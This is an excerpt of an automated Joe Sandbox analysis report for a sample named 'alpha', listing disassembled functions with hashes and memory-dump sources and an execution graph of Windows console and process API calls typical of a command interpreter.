                                              • Instruction ID: 77ab1895bddaabd542434f17aca530fee6fd7b1ad717c390fdc28c1049055b1e
                                              • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                              • Instruction Fuzzy Hash: 4B41C323A19796C1EA00DB15D4446B963A4FB8DBE8F508131DA5D837F4DF3AE84AC389
                                              Function 00007FF6EB17CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleTitle
                                              • String ID: -
                                              • API String ID: 3358957663-3695764949
                                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                              • Instruction ID: 0860ab46cd33e9d60c8b1afca95f15154b2537f9e8432c5a7d53614791c6d8be
                                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                              • Instruction Fuzzy Hash: BB318323A0864282EA049B11E4503F86BA5BB4EBF8F544135DD0E977F5DF7EE441C74A
                                              Function 00007FF6EB187280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmpswscanf
                                              • String ID: :EOF
                                              • API String ID: 1534968528-551370653
                                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                              • Instruction ID: 0277a87fec0a15bc642378dcef576300ba00173b452db3f657ca23fb02cb8757
                                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                              • Instruction Fuzzy Hash: 02318E33A18A42C6EB149B15E9813F872A1FF5CB68F444031EF4D862B5DF2EE941874A
                                              Function 00007FF6EB173BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp
                                              • String ID: /-Y
                                              • API String ID: 1886669725-4274875248
                                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction ID: 546cf248ef1937a6560cdfaa568024d4d6d61491d19ee941c16710dd2c2752d0
                                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction Fuzzy Hash: 2A21A667E0876581EA105B02A6443B876A0BB4DFE4F444032DE89877E4DF7EE4A2D70A
                                              Function 00007FF6EB17B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3$3
                                              • API String ID: 0-2538865259
                                              • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                              • Instruction ID: 59dd237efecc0b1cc373c63988b1351fcdec73dc9d8c2f8792b63a893b836354
                                              • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                              • Instruction Fuzzy Hash: 8C01426390A092CAF2458B20E8E43F42260BB4D338F940536C50AC22F9DF6E2485860A
                                              Function 00007FF6EB1806C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                              • Instruction ID: ef821c3ae07765de83a38d6bdb5185dcb333790d11e9d4c0222efe3f63a445f1
                                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                              • Instruction Fuzzy Hash: 22417C33A0974286EA148B10E4543B9B7A1FF89BA8B548038DA4D83764DF3EE444CB49

                                              Execution Graph

                                              Execution Coverage:5.6%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:663
                                              Total number of Limit Nodes:27
                                              execution_graph 16825 7ff6eb18415d 16826 7ff6eb18412e 16825->16826 16829 7ff6eb188f80 16826->16829 16832 7ff6eb188f89 16829->16832 16830 7ff6eb188fe0 RtlCaptureContext RtlLookupFunctionEntry 16833 7ff6eb189025 RtlVirtualUnwind 16830->16833 16834 7ff6eb189067 16830->16834 16831 7ff6eb18413e 16832->16830 16832->16831 16833->16834 16837 7ff6eb188fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16834->16837 16772 7ff6eb188d80 16773 7ff6eb188da4 16772->16773 16774 7ff6eb188db6 16773->16774 16775 7ff6eb188dbf Sleep 16773->16775 16776 7ff6eb188ddb _amsg_exit 16774->16776 16777 7ff6eb188de7 16774->16777 16775->16773 16776->16777 16778 7ff6eb188e56 _initterm 16777->16778 16779 7ff6eb188e73 _IsNonwritableInCurrentImage 16777->16779 16780 7ff6eb188e3c 16777->16780 16778->16779 16786 7ff6eb1837d8 GetCurrentThreadId OpenThread 16779->16786 16819 7ff6eb1804f4 16786->16819 16788 7ff6eb183839 HeapSetInformation RegOpenKeyExW 16789 7ff6eb18388d 16788->16789 16790 7ff6eb18e9f8 RegQueryValueExW RegCloseKey 16788->16790 16791 7ff6eb185920 VirtualQuery VirtualQuery 16789->16791 16793 7ff6eb18ea41 GetThreadLocale 16790->16793 16792 7ff6eb1838ab GetConsoleOutputCP GetCPInfo 16791->16792 16792->16793 16794 7ff6eb1838f1 memset 16792->16794 16810 7ff6eb183919 16793->16810 16794->16810 16795 7ff6eb184d5c 391 API calls 16795->16810 16796 7ff6eb183948 _setjmp 16796->16810 16797 7ff6eb18eb27 _setjmp 16797->16810 16798 7ff6eb173240 166 API calls 16798->16810 16799 7ff6eb198530 370 API calls 16799->16810 16800 7ff6eb1801b8 6 API calls 16800->16810 16801 7ff6eb184c1c 166 API calls 16801->16810 16802 7ff6eb18eb71 _setmode 16802->16810 16803 7ff6eb17df60 481 API calls 16803->16810 16804 7ff6eb1886f0 182 API calls 16804->16810 16805 7ff6eb180580 12 API calls 16806 7ff6eb18398b GetConsoleOutputCP GetCPInfo 16805->16806 16808 7ff6eb1804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16806->16808 16807 7ff6eb1858e4 EnterCriticalSection LeaveCriticalSection 16807->16810 16808->16810 16809 7ff6eb17be00 647 API calls 16809->16810 16810->16790 16810->16795 16810->16796 16810->16797 16810->16798 16810->16799 16810->16800 16810->16801 16810->16802 16810->16803 16810->16804 16810->16805 16810->16807 16810->16809 16811 7ff6eb1858e4 EnterCriticalSection LeaveCriticalSection 16810->16811 16812 7ff6eb18ebbe GetConsoleOutputCP GetCPInfo 16811->16812 16813 7ff6eb1804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16812->16813 16814 7ff6eb18ebe6 16813->16814 16815 7ff6eb17be00 647 API calls 16814->16815 16816 7ff6eb180580 12 API calls 16814->16816 16815->16814 16817 7ff6eb18ebfc GetConsoleOutputCP GetCPInfo 16816->16817 16818 7ff6eb1804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16817->16818 16818->16810 16820 7ff6eb180504 16819->16820 16821 7ff6eb18051e GetModuleHandleW 16820->16821 16822 7ff6eb18054d GetProcAddress 16820->16822 16823 7ff6eb18056c SetThreadLocale 16820->16823 16821->16820 16822->16820 20722 7ff6eb176be0 20723 7ff6eb17cd90 166 API calls 20722->20723 20724 7ff6eb176c04 20723->20724 20725 7ff6eb1941a2 20724->20725 20726 7ff6eb176c13 _pipe 20724->20726 20728 7ff6eb173278 166 API calls 20725->20728 20729 7ff6eb176c32 20726->20729 20759 7ff6eb176e26 20726->20759 20727 7ff6eb173278 166 API calls 20727->20725 20730 7ff6eb1941bc 20728->20730 20734 7ff6eb176df1 20729->20734 20773 7ff6eb17affc _dup 20729->20773 20731 7ff6eb19e91c 198 API calls 20730->20731 20732 7ff6eb1941c1 20731->20732 20736 7ff6eb173278 166 API calls 20732->20736 20735 7ff6eb176c7d 20735->20725 20739 7ff6eb17b038 _dup2 20735->20739 20737 7ff6eb1941d2 20736->20737 20738 7ff6eb19e91c 198 API calls 20737->20738 20740 7ff6eb1941d7 20738->20740 20741 7ff6eb176c93 20739->20741 20742 7ff6eb173278 166 API calls 20740->20742 20741->20740 20743 7ff6eb17d208 _close 20741->20743 20744 7ff6eb1941e4 20742->20744 20745 7ff6eb176ca4 20743->20745 20746 7ff6eb19e91c 198 API calls 20744->20746 20775 7ff6eb17be00 20745->20775 20747 7ff6eb1941e9 20746->20747 20750 7ff6eb176d07 20752 7ff6eb17b038 _dup2 20750->20752 20751 7ff6eb176ccf _get_osfhandle DuplicateHandle 20751->20750 20753 7ff6eb176d11 20752->20753 20753->20740 20754 7ff6eb17d208 _close 20753->20754 20755 7ff6eb176d22 20754->20755 20756 7ff6eb176e21 20755->20756 20758 7ff6eb17affc _dup 20755->20758 20757 7ff6eb19e91c 198 API calls 20756->20757 20757->20759 20760 7ff6eb176d57 20758->20760 20759->20727 20760->20732 20761 7ff6eb17b038 _dup2 20760->20761 20762 7ff6eb176d6c 20761->20762 20762->20740 20763 7ff6eb17d208 _close 20762->20763 20764 7ff6eb176d7c 20763->20764 20765 7ff6eb17be00 647 API calls 20764->20765 20766 7ff6eb176d9c 20765->20766 20767 7ff6eb17b038 _dup2 20766->20767 20768 7ff6eb176da8 20767->20768 20768->20740 20769 7ff6eb17d208 _close 20768->20769 20770 7ff6eb176db9 20769->20770 20770->20756 20771 7ff6eb176dc1 20770->20771 20771->20734 20809 7ff6eb176e60 20771->20809 20774 7ff6eb17b018 20773->20774 20774->20735 20776 7ff6eb17be1b 20775->20776 20787 7ff6eb176cc4 20775->20787 20777 7ff6eb17be67 20776->20777 20778 7ff6eb17be47 memset 20776->20778 20776->20787 20780 7ff6eb17be73 20777->20780 20782 7ff6eb17bf29 20777->20782 20788 7ff6eb17beaf 20777->20788 20885 7ff6eb17bff0 20778->20885 20781 7ff6eb17be92 20780->20781 20785 7ff6eb17bf0c 20780->20785 20794 7ff6eb17bea1 20781->20794 20813 7ff6eb17c620 GetConsoleTitleW 20781->20813 20783 7ff6eb17cd90 166 API calls 20782->20783 20784 7ff6eb17bf33 20783->20784 20784->20788 20791 7ff6eb17bf70 20784->20791 20793 7ff6eb1788a8 _wcsicmp 20784->20793 20923 7ff6eb17b0d8 memset 20785->20923 20787->20750 20787->20751 20788->20787 20790 7ff6eb17bff0 185 API calls 20788->20790 20790->20787 20803 7ff6eb17bf75 20791->20803 20983 7ff6eb1771ec 20791->20983 20798 7ff6eb17bf5a 20793->20798 20794->20788 20799 7ff6eb17af98 2 API calls 20794->20799 20795 7ff6eb17bf1e 20795->20788 20797 7ff6eb17bfa9 20797->20788 20800 7ff6eb17cd90 166 API calls 20797->20800 20798->20791 20801 7ff6eb180a6c 273 API calls 20798->20801 20799->20788 20802 7ff6eb17bfbb 20800->20802 20801->20791 20802->20788 20804 7ff6eb18081c 166 API calls 20802->20804 20805 7ff6eb17b0d8 194 API calls 20803->20805 20804->20803 20806 7ff6eb17bf7f 20805->20806 20806->20788 20856 7ff6eb185ad8 20806->20856 20812 7ff6eb176e6d 20809->20812 20810 7ff6eb176eb9 20810->20734 20811 7ff6eb185cb4 7 API calls 20811->20812 20812->20810 20812->20811 20815 7ff6eb17c675 20813->20815 20820 7ff6eb17ca2f 20813->20820 20814 7ff6eb18c5fc GetLastError 20814->20820 20816 7ff6eb17ca40 17 API calls 20815->20816 20826 7ff6eb17c69b 20816->20826 20817 7ff6eb173278 166 API calls 20817->20820 20818 7ff6eb18855c ??_V@YAXPEAX 20818->20820 20819 7ff6eb18291c 8 API calls 20844 7ff6eb17c762 20819->20844 20820->20814 20820->20817 20820->20818 20821 7ff6eb17c9b5 20825 7ff6eb18855c ??_V@YAXPEAX 20821->20825 20822 7ff6eb1789c0 23 API calls 20822->20844 20823 7ff6eb17c978 towupper 20823->20844 20824 7ff6eb18855c ??_V@YAXPEAX 20824->20844 20845 7ff6eb17c855 20825->20845 20826->20820 20826->20821 20828 7ff6eb17d3f0 223 API calls 20826->20828 20826->20844 20827 7ff6eb18c60e 20830 7ff6eb19ec14 173 API calls 20827->20830 20831 7ff6eb17c741 20828->20831 20829 7ff6eb17c872 20832 7ff6eb18855c ??_V@YAXPEAX 20829->20832 20830->20844 20834 7ff6eb17c74d 20831->20834 20836 7ff6eb17c8b5 wcsncmp 20831->20836 20835 7ff6eb17c87c 20832->20835 20833 7ff6eb18c6b8 SetConsoleTitleW 20833->20829 20837 7ff6eb17bd38 207 API calls 20834->20837 20834->20844 20838 7ff6eb188f80 7 API calls 20835->20838 20836->20834 20836->20844 20837->20844 20840 7ff6eb17c88e 20838->20840 20839 7ff6eb17c83d 20989 7ff6eb17cb40 20839->20989 20840->20794 20842 7ff6eb17c78a wcschr 20842->20844 20844->20814 20844->20819 20844->20820 20844->20821 20844->20822 20844->20823 20844->20824 20844->20827 20844->20839 20844->20842 20846 7ff6eb17ca25 20844->20846 20848 7ff6eb18c684 20844->20848 20851 7ff6eb17ca2a 20844->20851 20853 7ff6eb17ca16 GetLastError 20844->20853 20845->20829 20845->20833 20849 7ff6eb173278 166 API calls 20846->20849 20850 7ff6eb173278 166 API calls 20848->20850 20849->20820 20850->20820 20852 7ff6eb189158 7 API calls 20851->20852 20852->20820 20855 7ff6eb173278 166 API calls 20853->20855 20855->20820 20857 7ff6eb17cd90 166 API calls 20856->20857 20858 7ff6eb185b12 20857->20858 20859 7ff6eb17cb40 166 API calls 20858->20859 20884 7ff6eb185b8b 20858->20884 20861 7ff6eb185b26 20859->20861 20860 7ff6eb188f80 7 API calls 20862 7ff6eb17bf99 20860->20862 20863 7ff6eb180a6c 273 API calls 20861->20863 20861->20884 20862->20794 20864 7ff6eb185b43 20863->20864 20865 7ff6eb185bb8 20864->20865 20866 7ff6eb185b48 GetConsoleTitleW 20864->20866 20867 7ff6eb185bbd GetConsoleTitleW 20865->20867 20868 7ff6eb185bf4 20865->20868 20869 7ff6eb17cad4 172 API calls 20866->20869 20870 7ff6eb17cad4 172 API calls 20867->20870 20871 7ff6eb18f452 20868->20871 20875 7ff6eb185bfd 20868->20875 20872 7ff6eb185b66 20869->20872 20874 7ff6eb185bdb 20870->20874 20873 7ff6eb183c24 166 API calls 20871->20873 21005 7ff6eb184224 InitializeProcThreadAttributeList 20872->21005 20873->20884 21065 7ff6eb1796e8 20874->21065 20877 7ff6eb185c1b 20875->20877 20878 7ff6eb18f462 20875->20878 20875->20884 20881 7ff6eb173278 166 API calls 20877->20881 20882 7ff6eb173278 166 API calls 20878->20882 20879 7ff6eb185b7f 20883 7ff6eb185c3c SetConsoleTitleW 20879->20883 20881->20884 20882->20884 20883->20884 20884->20860 20886 7ff6eb17c01c 20885->20886 20889 7ff6eb17c0c4 20885->20889 20887 7ff6eb17c086 20886->20887 20888 7ff6eb17c022 20886->20888 20893 7ff6eb17c144 20887->20893 20904 7ff6eb17c094 20887->20904 20890 7ff6eb17c113 20888->20890 20891 7ff6eb17c030 20888->20891 20889->20777 20902 7ff6eb17ff70 2 API calls 20890->20902 20906 7ff6eb17c053 20890->20906 20892 7ff6eb17c039 wcschr 20891->20892 20891->20906 20895 7ff6eb17c301 20892->20895 20892->20906 20894 7ff6eb17c151 20893->20894 20915 7ff6eb17c1c8 20893->20915 21271 7ff6eb17c460 20894->21271 20901 7ff6eb17cd90 166 API calls 20895->20901 20896 7ff6eb17c058 20907 7ff6eb17ff70 2 API calls 20896->20907 20910 7ff6eb17c073 20896->20910 20897 7ff6eb17c0c6 20900 7ff6eb17c0cf wcschr 20897->20900 20897->20910 20899 7ff6eb17c460 183 API calls 20899->20904 20905 7ff6eb17c1be 20900->20905 20900->20910 20922 7ff6eb17c30b 20901->20922 20902->20906 20904->20889 20904->20899 20908 7ff6eb17cd90 166 API calls 20905->20908 20906->20896 20906->20897 20912 7ff6eb17c211 20906->20912 20907->20910 20908->20915 20909 7ff6eb17c460 183 API calls 20909->20889 20910->20889 20911 7ff6eb17c460 183 API calls 20910->20911 20911->20910 20917 7ff6eb17ff70 2 API calls 20912->20917 20913 7ff6eb17c285 20913->20912 20918 7ff6eb17b6b0 170 API calls 20913->20918 20914 7ff6eb17b6b0 170 API calls 20914->20906 20915->20889 20915->20912 20915->20913 20919 7ff6eb17d840 178 API calls 20915->20919 20916 7ff6eb17d840 178 API calls 20916->20922 20917->20889 20920 7ff6eb17c2ac 20918->20920 20919->20915 20920->20910 20920->20912 20921 7ff6eb17c3d4 20921->20910 20921->20912 20921->20914 20922->20889 20922->20912 20922->20916 20922->20921 20924 7ff6eb17ca40 17 API calls 20923->20924 20940 7ff6eb17b162 20924->20940 20925 7ff6eb17b2e1 20927 7ff6eb17b2f7 ??_V@YAXPEAX 20925->20927 20928 7ff6eb17b303 20925->20928 20926 7ff6eb17b1d9 20931 7ff6eb17cd90 166 API calls 20926->20931 20946 7ff6eb17b1ed 20926->20946 20927->20928 20930 7ff6eb188f80 7 API calls 20928->20930 20929 7ff6eb181ea0 8 API calls 20929->20940 20932 7ff6eb17b315 20930->20932 20931->20946 20932->20781 20932->20795 20934 7ff6eb17b228 _get_osfhandle 20936 7ff6eb17b23f _get_osfhandle 20934->20936 20934->20946 20935 7ff6eb18bfef _get_osfhandle SetFilePointer 20937 7ff6eb18c01d 20935->20937 20935->20946 20936->20946 20939 7ff6eb1833f0 _vsnwprintf 20937->20939 20938 7ff6eb17affc _dup 20938->20946 20942 7ff6eb18c038 20939->20942 20940->20925 20940->20926 20940->20929 20940->20940 20941 7ff6eb1801b8 6 API calls 20941->20946 20947 7ff6eb173278 166 API calls 20942->20947 20943 7ff6eb18c1c3 20944 7ff6eb1833f0 _vsnwprintf 20943->20944 20944->20942 20945 7ff6eb17d208 _close 20945->20946 20946->20925 20946->20934 20946->20935 20946->20938 20946->20941 20946->20943 20946->20945 20948 7ff6eb18c060 20946->20948 20950 7ff6eb17b038 _dup2 20946->20950 20951 7ff6eb18c246 20946->20951 20954 7ff6eb1826e0 19 API calls 20946->20954 20957 7ff6eb17b356 20946->20957 20982 7ff6eb18c1a5 20946->20982 21285 7ff6eb19f318 _get_osfhandle GetFileType 20946->21285 20949 7ff6eb18c1f9 20947->20949 20948->20951 20955 7ff6eb1809f4 2 API calls 20948->20955 20952 7ff6eb17af98 2 API calls 20949->20952 20950->20946 20956 7ff6eb17af98 2 API calls 20951->20956 20952->20925 20953 7ff6eb17b038 _dup2 20958 7ff6eb18c1b7 20953->20958 20954->20946 20959 7ff6eb18c084 20955->20959 20960 7ff6eb18c24b 20956->20960 20966 7ff6eb17af98 2 API calls 20957->20966 20961 7ff6eb18c1be 20958->20961 20962 7ff6eb18c207 20958->20962 20963 7ff6eb17b900 166 API calls 20959->20963 20964 7ff6eb19f1d8 166 API calls 20960->20964 20967 7ff6eb17d208 _close 20961->20967 20965 7ff6eb17d208 _close 20962->20965 20968 7ff6eb18c08c 20963->20968 20964->20925 20965->20957 20969 7ff6eb18c211 20966->20969 20967->20943 20970 7ff6eb18c094 wcsrchr 20968->20970 20978 7ff6eb18c0ad 20968->20978 20971 7ff6eb1833f0 _vsnwprintf 20969->20971 20970->20978 20972 7ff6eb18c22c 20971->20972 20973 7ff6eb173278 166 API calls 20972->20973 20973->20925 20974 7ff6eb18c0e0 _wcsnicmp 20974->20978 20975 7ff6eb17ff70 2 API calls 20976 7ff6eb18c13b 20975->20976 20976->20951 20979 7ff6eb18c146 SearchPathW 20976->20979 20977 7ff6eb18c106 20977->20975 20978->20974 20978->20977 20978->20978 20979->20951 20980 7ff6eb18c188 20979->20980 20981 7ff6eb1826e0 19 API calls 20980->20981 20981->20982 20982->20953 20984 7ff6eb177279 20983->20984 20985 7ff6eb177211 _setjmp 20983->20985 20984->20797 20985->20984 20987 7ff6eb177265 20985->20987 21286 7ff6eb1772b0 20987->21286 20990 7ff6eb17cb63 20989->20990 20991 7ff6eb17cd90 166 API calls 20990->20991 20992 7ff6eb17c848 20991->20992 20992->20845 20993 7ff6eb17cad4 20992->20993 20994 7ff6eb17cad9 20993->20994 21002 7ff6eb17cb05 20993->21002 20995 7ff6eb17cd90 166 API calls 20994->20995 20994->21002 20996 7ff6eb18c722 20995->20996 20997 7ff6eb18c72e GetConsoleTitleW 20996->20997 20996->21002 20998 7ff6eb18c74a 20997->20998 20997->21002 20999 7ff6eb17b6b0 170 API calls 20998->20999 21004 7ff6eb18c778 20999->21004 21000 7ff6eb18c7ec 21001 7ff6eb17ff70 2 API calls 21000->21001 21001->21002 21002->20845 21003 7ff6eb18c7dd SetConsoleTitleW 21003->21000 21004->21000 21004->21003 21006 7ff6eb1842ab UpdateProcThreadAttribute 21005->21006 21007 7ff6eb18ecd4 GetLastError 21005->21007 21008 7ff6eb18ecf0 GetLastError 21006->21008 21009 7ff6eb1842eb memset memset GetStartupInfoW 21006->21009 21010 7ff6eb18ecee 21007->21010 21102 7ff6eb199eec 21008->21102 21012 7ff6eb183a90 170 API calls 21009->21012 21014 7ff6eb1843a8 21012->21014 21015 7ff6eb17b900 166 API calls 21014->21015 21016 7ff6eb1843bb 21015->21016 21017 7ff6eb184638 _local_unwind 21016->21017 21018 7ff6eb1843cc 21016->21018 21017->21018 21019 7ff6eb184415 21018->21019 21020 7ff6eb1843de wcsrchr 21018->21020 21089 7ff6eb185a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 21019->21089 21020->21019 21021 7ff6eb1843f7 lstrcmpW 21020->21021 21021->21019 21023 7ff6eb184668 21021->21023 21090 7ff6eb199044 21023->21090 21024 7ff6eb18441a 21026 7ff6eb18442a CreateProcessW 21024->21026 21028 7ff6eb184596 CreateProcessAsUserW 21024->21028 21027 7ff6eb18448b 21026->21027 21029 7ff6eb184495 CloseHandle 21027->21029 21030 7ff6eb184672 GetLastError 21027->21030 21028->21027 21031 7ff6eb18498c 8 API calls 21029->21031 21044 7ff6eb18468d 21030->21044 21032 7ff6eb1844c5 21031->21032 21036 7ff6eb1844cd 21032->21036 21032->21044 21033 7ff6eb1847a3 21033->20879 21034 7ff6eb1844f8 21034->21033 21035 7ff6eb184612 21034->21035 21039 7ff6eb185cb4 7 API calls 21034->21039 21040 7ff6eb18461c 21035->21040 21042 7ff6eb1847e1 CloseHandle 21035->21042 21036->21033 21036->21034 21054 7ff6eb19a250 33 API calls 21036->21054 21037 7ff6eb17cd90 166 API calls 21038 7ff6eb184724 21037->21038 21041 7ff6eb18472c _local_unwind 21038->21041 21049 7ff6eb18473d 21038->21049 21043 7ff6eb184517 21039->21043 21045 7ff6eb17ff70 GetProcessHeap RtlFreeHeap 21040->21045 21041->21049 21042->21040 21046 7ff6eb1833f0 _vsnwprintf 21043->21046 21044->21036 21044->21037 21047 7ff6eb1847fa DeleteProcThreadAttributeList 21045->21047 21048 7ff6eb184544 21046->21048 21050 7ff6eb188f80 7 API calls 21047->21050 21051 7ff6eb18498c 8 API calls 21048->21051 21055 7ff6eb17ff70 GetProcessHeap RtlFreeHeap 21049->21055 21052 7ff6eb184820 21050->21052 21053 7ff6eb184558 21051->21053 21052->20879 21056 7ff6eb184564 21053->21056 21057 7ff6eb1847ae 21053->21057 21054->21034 21059 7ff6eb18475b _local_unwind 21055->21059 21060 7ff6eb18498c 8 API calls 21056->21060 21058 7ff6eb1833f0 _vsnwprintf 21057->21058 21058->21035 21059->21036 21061 7ff6eb184577 21060->21061 21061->21040 21062 7ff6eb18457f 21061->21062 21063 7ff6eb19a920 210 API calls 21062->21063 21064 7ff6eb184584 21063->21064 21064->21040 21077 7ff6eb179737 21065->21077 21067 7ff6eb17977d memset 21069 7ff6eb17ca40 17 API calls 21067->21069 21068 7ff6eb17cd90 166 API calls 21068->21077 21069->21077 21070 7ff6eb18b76e 21073 7ff6eb173278 166 API calls 21070->21073 21071 7ff6eb18b7b3 21072 7ff6eb18b79a 21075 7ff6eb18855c ??_V@YAXPEAX 21072->21075 21076 7ff6eb18b787 21073->21076 21074 7ff6eb17b364 17 API calls 21074->21077 21075->21071 21078 7ff6eb18b795 21076->21078 21081 7ff6eb19e944 393 API calls 